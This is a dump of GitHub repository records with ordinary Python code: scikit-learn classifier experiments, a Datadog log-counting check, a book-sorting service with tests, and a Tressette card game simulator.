"text": "#https://stackabuse.com/k-nearest-neighbors-algorithm-in-python-and-scikit-learn/\n\nimport pandas as pd\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport sklearn.metrics as metrics\nimport sklearn.neighbors as neighbors\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nsat_accuracy = []\npen_accuracy = []\n\nleafsize = range(1, 61)\nalgorithms = ['ball_tree', 'kd_tree', 'brute']\n\nsat_classifier = KNeighborsClassifier(n_neighbors=6)\npen_classifier = KNeighborsClassifier(n_neighbors=1)\nsatT1 = time.time() \nsat_classifier.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\npenT1 = time.time()\npen_classifier.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n\nprint(satT2-satT1)\nprint(penT2-penT1)\n\ny_pred_sat = sat_classifier.predict(X_test_sat)\ny_pred_pen = pen_classifier.predict(X_test_pen)\nsat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat))\npen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen))\n\npen_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_error = [1 - accuracy for accuracy in sat_accuracy]\n \n# plt.figure(figsize=(12, 6)) \n# plt.plot(leafsize, pen_error, color='red', linestyle='solid', marker='')\n# for i in range(3):\n# plt.bar(algorithms[i], pen_error[i])\n# plt.title('Error Rate vs Leaf Size') \n# plt.xlabel('Leaf Size') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=(12, 6))\n# plt.plot(leafsize, sat_error, color='red', linestyle='solid', marker='')\n# for i in range(3):\n# plt.bar(algorithms[i], sat_error[i])\n# plt.title('Error Rate vs Leaf Size') \n# plt.xlabel('Leaf Size') \n# plt.ylabel('Error')\n# plt.show()\n\n# from sklearn.metrics import classification_report, confusion_matrix\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))"
},
{
"alpha_fraction": 0.7090961337089539,
"alphanum_fraction": 0.7205377817153931,
"avg_line_length": 36.9782600402832,
"blob_id": "26f0310cce5151443c3ad9542aac5adfae52c53f",
"content_id": "050df0ef0e5bc0da8b76b44820c36078dbdfe74c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3496,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 92,
"path": "/src/decision_tree.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/decision-trees-in-python-with-scikit-learn/\n\nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom sklearn import metrics \nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\nsat_train_error = []\nsat_test_error = []\nsat_accuracy = []\npen_accuracy = []\n\nfrom sklearn.tree import DecisionTreeClassifier \nmax_depth_list = np.linspace(2, 50, 49, endpoint=True)\n\nsat_classifier = DecisionTreeClassifier(max_depth=10, min_samples_split=10)\npen_classifier = DecisionTreeClassifier(max_depth=15, min_samples_split=2) \nsatT1 = time.time() \nsat_classifier.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\npenT1 = time.time()\npen_classifier.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n\n# print(satT2-satT1)\n# print(penT2-penT1)\n\ny_pred_sat_test = sat_classifier.predict(X_test_sat)\ny_pred_pen_test = pen_classifier.predict(X_test_pen)\n\npen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\nsat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\npen_test_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_test_error = [1 - accuracy for accuracy in sat_accuracy]\n\nprint(pen_test_error)\nprint(sat_test_error)\n \n# plt.figure(figsize=(12, 6)) \n# plt.plot(max_depth_list, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Minimum Samples to Split Internal Node') \n# plt.xlabel('Minimum Samples') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=(12, 6))\n# plt.plot(max_depth_list, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Minimum Samples to Split Internal Node') \n# plt.xlabel('Minimum Samples') \n# plt.ylabel('Error')\n# plt.show()\n\n# from sklearn.metrics import classification_report, confusion_matrix\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))\n\n# from sklearn import metrics \n# print('Sat Mean Absolute Error:', metrics.mean_absolute_error(y_test_sat, y_pred_sat)) \n# print('Sat Mean Squared Error:', metrics.mean_squared_error(y_test_sat, y_pred_sat)) \n# print('Sat Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test_sat, y_pred_sat))) \n# print('Pen Mean Absolute Error:', metrics.mean_absolute_error(y_test_pen, y_pred_pen)) \n# print('Pen Mean Squared Error:', metrics.mean_squared_error(y_test_pen, y_pred_pen)) \n# print('Pen Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test_pen, y_pred_pen))) \n"
},
{
"alpha_fraction": 0.7069175839424133,
"alphanum_fraction": 0.7198117971420288,
"avg_line_length": 38.86111068725586,
"blob_id": "3c5d89d95196bb10395158597b65ec9d09ab7489",
"content_id": "e9f53396d4e7ec6510f4bc231a9280087c9a5ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5739,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 144,
"path": "/src/boosting.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://machinelearningmastery.com/ensemble-machine-learning-algorithms-python-scikit-learn/\n#https://www.datacamp.com/community/tutorials/parameter-optimization-machine-learning-models\n#https://www.datacamp.com/community/tutorials/adaboost-classifier-python\n\nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import SVC \nfrom sklearn import model_selection, metrics\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\n# sat_num_rows = satdata.index._stop\n# pen_num_rows = pendata.index._stop\n\n# pen_x = []\n# sat_x = []\n# pen_test_error = []\n# sat_test_error = []\n\n\n\n# sat_num_items = int(sat_num_rows*i*.05)\n# pen_num_items = int(pen_num_rows*i*.05)\n# pen_x.append(pen_num_items)\n# sat_x.append(sat_num_items)\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\npen_test_accuracy = []\nsat_train_error = []\nsat_test_error = []\nsat_test_accuracy = []\npen_train_size = []\nsat_train_size = []\n\ndatasplits = np.linspace(.05, 1.0, 20, endpoint=True) \nseed = 7\nnum_trees = 30\n#kfold = model_selection.KFold(n_splits=10, random_state=seed)\npen_model = GradientBoostingClassifier(n_estimators=num_trees, random_state=seed)\n#pen_model = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000)\npenT1 = time.time() \npen_model.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n#pen_train_size, pen_train_score, pen_test_score = model_selection.learning_curve(\n #pen_model, X_train_pen, y_train_pen, train_sizes=datasplits, shuffle=True, cv=3,\n #scoring='accuracy')\n#y_pred_pen_train = pen_model.predict(X_train_pen)\n#y_pred_pen_test = pen_model.predict(X_test_pen)\n#pen_results = model_selection.cross_val_score(pen_model, X_train_pen, y_train_pen, cv=kfold)\n\nsat_model = GradientBoostingClassifier(n_estimators=num_trees, random_state=seed)\n#sat_model = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000)\nsatT1 = time.time()\nsat_model.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\n#sat_train_size, sat_train_score, sat_test_score = model_selection.learning_curve(\n #sat_model, X_train_sat, y_train_sat, train_sizes=datasplits, shuffle=True, cv=3, \n #scoring='accuracy')\n#y_pred_sat_train = sat_model.predict(X_train_sat)\n#y_pred_sat_test = sat_model.predict(X_test_sat)\n#sat_results = model_selection.cross_val_score(sat_model, X_train_sat, y_train_sat, cv=kfold)\n#pen_test_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\n#sat_test_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\n# pen_train_error.append(metrics.mean_absolute_error(y_train_pen, y_pred_pen_train))\n# pen_test_error.append(metrics.mean_absolute_error(y_test_pen, y_pred_pen_test))\n# sat_train_error.append(metrics.mean_absolute_error(y_train_sat, y_pred_sat_train))\n# sat_test_error.append(metrics.mean_absolute_error(y_test_sat, y_pred_sat_test))\n\nprint(satT2-satT1)\nprint(penT2-penT1)\n\n# pen_train_accuracy = np.mean(pen_train_score, axis=1)\n# pen_test_accuracy = np.mean(pen_test_score, axis=1)\n# sat_train_accuracy = np.mean(sat_train_score, axis=1)\n# sat_test_accuracy = np.mean(sat_test_score, axis=1)\n\n# pen_train_error = [1 - accuracy for accuracy in pen_train_accuracy]\n# pen_test_error = [1 - accuracy for accuracy in pen_test_accuracy]\n# sat_train_error = [1 - accuracy for accuracy in sat_train_accuracy]\n# sat_test_error = [1 - accuracy for accuracy in sat_test_accuracy]\n\n# plt.figure(figsize=(12, 6)) \n# plt.plot(pen_train_size, pen_train_error, label='Training Error', color='red', linestyle='solid', marker='')\n# plt.plot(pen_train_size, pen_test_error, label='Testing Error', color='green', linestyle='dashed', marker='')\n# plt.title('Error Rate vs Training Set Size') \n# plt.xlabel('Training Set Size') \n# plt.ylabel('Error')\n# plt.legend()\n# plt.show()\n# plt.plot(sat_train_size, sat_train_error, label='Training Error', color='red', linestyle='solid', marker='')\n# plt.plot(sat_train_size, sat_test_error, label='Testing Error', color='green', linestyle='dashed', marker='')\n# plt.title('Error Rate vs Training Set Size') \n# plt.xlabel('Training Set Size') \n# plt.ylabel('Error')\n# plt.legend()\n# plt.show()\n\n# plt.figure(figsize=(12, 6)) \n# plt.plot(treenums, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Number of Estimators') \n# plt.xlabel('Number of Estimators') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=( 12, 6))\n# plt.plot(treenums, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Number of Estimators') \n# plt.xlabel('Number of Estimators') \n# plt.ylabel('Error')\n# plt.show()\n\n#print(sat_results.mean())\n#print(pen_results.mean())\n#print(*sat_sqerror)\n#print(*pen_sqerror)"
}
] | 5 |
rrykhlitskyy/Datadog
|
https://github.com/rrykhlitskyy/Datadog
|
4ccd84b788746d662de8eefedc8324c8e70dbaf7
|
2e96f93a2b6f6d63c6226c9d694aabbd28c8d657
|
23aeff859caf5ab0628e40f0c0e84ee5e7a8aca9
|
refs/heads/master
| 2021-07-18T14:35:41.864326 | 2017-10-24T10:56:01 | 2017-10-24T10:56:01 | 108,113,843 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.6942856907844543,
"avg_line_length": 32.90322494506836,
"blob_id": "c66f78509f666727d9e5fe2b36e8edf6361df5c7",
"content_id": "594549f12babbcfb7e1a8279b0dabc1656d19f23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1050,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 31,
"path": "/checks.d/count.py",
"repo_name": "rrykhlitskyy/Datadog",
"src_encoding": "UTF-8",
"text": "import re\n\nfrom collections import deque\nfrom checks import AgentCheck\n\nclass LogsCheck(AgentCheck):\n\tdef check(self, instance):\n\t\t\n\t\t#Load values from the instance config\n\t\tlogs = instance['logs']\n\t\tdefault_lines_check = self.init_config.get('default_lines_check', 100)\n\t\tlines_check = float(instance.get('lines_check', default_lines_check))\n\t\tdefault_regex = self.init_config.get('default_regex', 'error')\n\t\tregex = str(instance.get('regex', default_regex))\n\t\tdefault_metric_name = self.init_config.get('default_metric_name', 'mml.logs.error_counter')\n\t\tmetric_name = str(instance.get('metric_name', default_metric_name))\n\t\tdefault_tag = self.init_config.get('default_tag', [])\n\t\ttag = instance.get('tag', default_tag)\n\n\t\t#Get count result\n\t\tcount_list =[]\n\t\twith open(logs) as file:\n\t\t\tfor line in deque(file, lines_check):\n\t\t\t\tx = re.search(regex, line, re.IGNORECASE)\n\t\t\t\tif x != None:\n\t \t\t\t\tcount_list.append(x.group(0))\n\t\tcount = len(count_list)\n\t\tself.gauge(metric_name, count, tags=tag)\n\nif __name__ == '__main__':\n check.check(instance)"
}
] | 1 |
k018c1072/Task08
|
https://github.com/k018c1072/Task08
|
21f58a169788b8924ce69042766d5d0a0ea370ea
|
7ec5b104d3dcc79e9f2774d5783a77ac633d5c58
|
28176d5b1faa406752379eb4afa369ec7347b710
|
refs/heads/master
| 2022-10-04T20:00:47.545325 | 2020-06-08T04:53:55 | 2020-06-08T04:53:55 | 270,531,896 | 0 | 0 | null | 2020-06-08T04:47:07 | 2020-06-08T04:48:23 | 2020-06-08T04:53:56 | null |
[
{
"alpha_fraction": 0.4761904776096344,
"alphanum_fraction": 0.5,
"avg_line_length": 15.800000190734863,
"blob_id": "741c87cd8ff03cb6b2e7e730231e1ea5a89ce82b",
"content_id": "c2097678ddb3e08a4cab6e4a0bf1fcc46c532a2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 98,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/Exam-8_2.py",
"repo_name": "k018c1072/Task08",
"src_encoding": "UTF-8",
"text": "value = int(input('入力> '))\nif value % 2 == 0:\n print('偶数')\nelse:\n print('奇数')\n"
},
{
"alpha_fraction": 0.3333333432674408,
"alphanum_fraction": 0.5,
"avg_line_length": 10,
"blob_id": "4b94e5275201db7ca5ad00e35b0519cb6aeefb73",
"content_id": "ae97fe6706ffb697f422e57c71240393296be9f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 1,
"path": "/README.md",
"repo_name": "k018c1072/Task08",
"src_encoding": "UTF-8",
"text": "\"# Task08\" \n"
},
{
"alpha_fraction": 0.508474588394165,
"alphanum_fraction": 0.5423728823661804,
"avg_line_length": 18.66666603088379,
"blob_id": "1ca8b3e91f6ee0e6a23446c55cbcb467b66668c1",
"content_id": "135195caca4f81cef140640be3bf947acae38409",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/Exam-8_1.py",
"repo_name": "k018c1072/Task08",
"src_encoding": "UTF-8",
"text": "value = int(input('入力> '))\nif value < 20:\n print('未成年')\n"
}
] | 3 |
lutielo/SortingService
|
https://github.com/lutielo/SortingService
|
7b8a43d62c4d4fc28666bc9b8b18745e3672e711
|
66e6c96d21ff3ffbce04b1a78a67e3ec51f64e45
|
3387ad4f08852555171c9fdabb296470e26ca5c7
|
refs/heads/master
| 2021-01-12T06:04:28.590126 | 2016-12-26T16:42:32 | 2016-12-26T16:42:32 | 77,242,591 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7697368264198303,
"alphanum_fraction": 0.7697368264198303,
"avg_line_length": 32.88888931274414,
"blob_id": "752890926cf4a4b8a1d8c986d361f2d5b6950027",
"content_id": "c8afb30a9a5860c912cd2a1cf57387183962b4cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 9,
"path": "/SortingService.py",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "from SortingServiceException import SortingServiceException\nfrom operator import attrgetter\n\n\ndef sort(books, attribute, direction):\n try:\n return sorted(books, key=attrgetter(attribute), reverse=direction)\n except TypeError:\n raise SortingServiceException(\"A set of books is needed\")"
},
{
"alpha_fraction": 0.8039215803146362,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 24.5,
"blob_id": "cb2cc3a28acd0be6b2840cef15ec53efbf8e4b19",
"content_id": "5a425deffc2b10e54763246370f59f1aa454b1ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 2,
"path": "/SortingServiceException.py",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "class SortingServiceException(Exception):\n pass\n"
},
{
"alpha_fraction": 0.6279844641685486,
"alphanum_fraction": 0.6446418762207031,
"avg_line_length": 23.02666664123535,
"blob_id": "db05030332023c3a22ff9becf40c8aacb3032223",
"content_id": "6fccc68e4e08ef85df3ddaefdf611cfafc7a11fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1801,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 75,
"path": "/Teste.py",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "import SortingService\n\nascending = False\ndescending = True\n\ntitle = 'title'\nauthor = 'author'\nyear = 'year'\n\n\nclass Book:\n def __init__(self, index, title, author, year):\n self.index = index\n self.title = title\n self.author = author\n self.year = year\n\nbooks = [\n Book(1, 'Java How to Program', 'Deitel & Deitel', 2007),\n Book(2, 'Patterns of Enterprise Application Architecture', 'Martin Fwoler', 2002),\n Book(3, 'Head First Design Patterns', 'Elisabeth Freeman', 2004),\n Book(4, 'Internet & WWW: How to Program', 'Deitel & Deitel', 2007),\n]\n\nbooks_empty = []\n\nbooks_null = None\n\n\ndef print_sorted_books(sorted_books):\n for book in sorted_books:\n print book.index\n print book.title\n print book.author\n print book.year\n print('')\n\n\ndef scenario1():\n sorted_books = SortingService.sort(books, title, ascending)\n print_sorted_books(sorted_books)\n\n\ndef scenario2():\n sorted_books = SortingService.sort(books, title, descending)\n sorted_books = SortingService.sort(sorted_books, author, ascending)\n print_sorted_books(sorted_books)\n\n\ndef scenario3():\n sorted_books = SortingService.sort(books, title, ascending)\n sorted_books = SortingService.sort(sorted_books, author, descending)\n sorted_books = SortingService.sort(sorted_books, year, descending)\n print_sorted_books(sorted_books)\n\n\ndef scenario4():\n sorted_books = SortingService.sort(books_null, title, ascending)\n print_sorted_books(sorted_books)\n\n\ndef scenario5():\n sorted_books = SortingService.sort(books_empty, title, ascending)\n print_sorted_books(sorted_books)\n\n\nscenario1()\nprint('--------------------')\nscenario2()\nprint('--------------------')\nscenario3()\nprint('--------------------')\nscenario4()\nprint('--------------------')\nscenario5()"
},
{
"alpha_fraction": 0.7118644118309021,
"alphanum_fraction": 0.7231638431549072,
"avg_line_length": 28.5,
"blob_id": "3e47c06cb696456277686543b5b9adde574da12e",
"content_id": "a3dfce28ebf1c1502fa04e5694181f9d04dc802e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 12,
"path": "/README.md",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "# SortingService\n\n### Setup instructions\n\n- You'll need the version 2.7 or higher of Python language. If not installed, follow the steps in this page http://tecadmin.net/install-python-2-7-on-ubuntu-and-linuxmint/! \n- Fork this project\n\n### Run commands\n\n- cd [ dir ] - Where [dir] is the directory you forked the project\n- python \"Teste.py\"\n- Enjoy it!\n"
}
] | 4 |
Enucatl/tressette
|
https://github.com/Enucatl/tressette
|
bdf7cbf1761f9f0159b8ac6593724461803f87dd
|
94535889ca1d236bffcc5de0f2173766764e0875
|
dd900effab3020c9c393c5f2a20814e833926edf
|
refs/heads/master
| 2020-09-30T15:16:53.171804 | 2018-11-02T11:51:37 | 2018-11-02T11:51:37 | 73,509,867 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6521739363670349,
"alphanum_fraction": 0.6837944388389587,
"avg_line_length": 15.866666793823242,
"blob_id": "1997351c9f270c018096d2c34c2b93b436ea8ef5",
"content_id": "78e5b62dda00586ae050b249a569cb4741807d87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 253,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 15,
"path": "/programma/analisi.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding=utf-8\n\nfrom __future__ import division, print_function\n\nfrom ROOT import TH1F\n\ninput = open('punteggi')\n\nhist = TH1F(\"punteggi\", \"punteggi\", 11, 0, 11)\nfor line in input:\n hist.Fill(float(line))\n\nhist.Draw()\nraw_input()\n"
},
{
"alpha_fraction": 0.5595829486846924,
"alphanum_fraction": 0.5675272941589355,
"avg_line_length": 34.80356979370117,
"blob_id": "d359db3fe058b68ca309b979dd406ef2266c7785",
"content_id": "0cc09e81f1135655a717b17dcae35910fd9e0721",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2019,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 56,
"path": "/programma/giocatore.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\n\nimport carta\nimport random\n\ndef trova_battuta(carte_giocate):\n num_battuta = 0\n for battuta in carte_giocate:\n for c in battuta:\n #try:\n # c + 1\n #except TypeError:\n # return num_battuta\n if not isinstance(c, carta.Carta):\n return num_battuta\n num_battuta += 1\n return -1\n\nclass Giocatore(object):\n\n def __init__(self, carte_in_mano, squadra):\n #per carte_in_mano si intende una lista di oggetti Carta\n self.carte_in_mano = sorted(carte_in_mano, carta.ordine_convenzionale)\n self.squadra = squadra\n self.carte_in_mano\n\n def gioca_carta(self, carte_giocate=0):\n num_battuta_in_corso = trova_battuta(carte_giocate)\n battuta_in_corso = carte_giocate[num_battuta_in_corso]\n battuta_in_corso = enumerate(battuta_in_corso)\n battuta_in_corso = [c for c in battuta_in_corso if isinstance(c[1],\n carta.Carta)]\n\n giocate_legali = []\n if not battuta_in_corso:\n #se la battuta è vuota, significa che è primo di mano, quindi\n #può giocare come preferisce\n giocate_legali = self.carte_in_mano\n else:\n comanda = 0\n for i in range(4):\n comanda = battuta_in_corso[i][1]\n if (battuta_in_corso[i - 1][0] % 4 != battuta_in_corso[i][0]\n % 4 or len(battuta_in_corso) == 1):\n break\n giocate_legali = [c for c in self.carte_in_mano\n if carta.stesso_palo(c, comanda)]\n #filtra la lista delle carte che ha in mano, essendo costretto a\n #rispondere al palo\n if not giocate_legali:\n #se non può rispondere al palo, può giocare come vuole\n giocate_legali = self.carte_in_mano\n giocata = random.choice(giocate_legali)\n\n del self.carte_in_mano[self.carte_in_mano.index(giocata)]\n return giocata\n \n"
},
{
"alpha_fraction": 0.5193325281143188,
"alphanum_fraction": 0.5445665717124939,
"avg_line_length": 30.5,
"blob_id": "12d082b5312d50c0729dbf7343db1c7c33dae6a4",
"content_id": "38c151bb28a2afc09365f8499637dd4cf6c69292",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2460,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 78,
"path": "/programma/carta.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\n\ndef ordine_convenzionale(x, y):\n if x.palo > y.palo:\n return 1\n elif x.palo == y.palo:\n if x > y:\n return 1\n else: return -1\n else: return -1\n\ndef stesso_palo(x, y):\n if x.palo == y.palo:\n return True\n else:\n return False\n\ndef comanda_battuta(battuta, primo_di_mano):\n \"\"\"prende la lista delle carte della battuta, vede chi è primo di mano e\n decide chi prende. Restituisce l'indice di chi ha conquistato la\n battuta\"\"\"\n comanda = battuta[primo_di_mano]\n \"\"\"ordina le carte nell'ordine in cui sono state giocate per un'iterazione più comoda:\"\"\"\n battuta_ordinata = battuta[primo_di_mano:] + battuta[:primo_di_mano]\n \"\"\"cerca la meglio\"\"\"\n for risposta in battuta_ordinata:\n if not comanda > risposta:\n comanda = risposta\n return battuta.index(comanda)\n\nclass Carta(object):\n\n def __init__(self, numero):\n self.palo = numero // 10\n self.valore = (numero % 10) + 1\n #così i valori sono da 1 a 10 e non 0-9\n valgono_uno = [2, 3, 8, 9, 10]\n valgono_tre = [1]\n if self.valore in valgono_uno:\n self.punti = 1\n elif self.valore in valgono_tre:\n self.punti = 3\n else: self.punti = 0\n\n def __repr__(self):\n diz_pali = {3:'denari', 2:'spade', 1:'coppe', 0:'bastoni'}\n diz_valori = {1:'Asso', 2:'Due', 3:'Tre', 4:'Quattro',\n 5:'Cinque', 6: 'Sei', 7: 'Sette', 8: 'Fante',\n 9: 'Cavallo', 10: 'Re'}\n return diz_valori[self.valore] + ' di ' + diz_pali[self.palo]\n\n def __gt__(self, other):\n potenza = [4, 5, 6, 7, 8, 9, 10, 1, 2, 3]\n if other.palo != self.palo:\n return True\n elif potenza.index(self.valore) > potenza.index(other.valore):\n return True\n else:\n return False\n\n def __eq__(self, other):\n if other.palo == self.palo and self.valore == other.valore:\n return True\n else: return False\n\n def __ne__(self, other):\n if other.palo != self.palo or self.valore != other.valore:\n return True\n else: return False\n\n #def __lt__(self, other):\n # potenza = [4, 5, 6, 7, 8, 9, 10, 1, 2, 3]\n # if other.palo != self.palo:\n # return True\n # elif potenza.index(self.valore) < potenza.index(other.valore):\n # return True\n # else:\n # return False\n"
},
{
"alpha_fraction": 0.6601671576499939,
"alphanum_fraction": 0.6660863757133484,
"avg_line_length": 45.90163803100586,
"blob_id": "a5dd71095e55888621ee3dbe740129381c452c14",
"content_id": "5a226d799e1e79aa70586b20b2af29ec2d55f209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2873,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 61,
"path": "/programma/passata.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
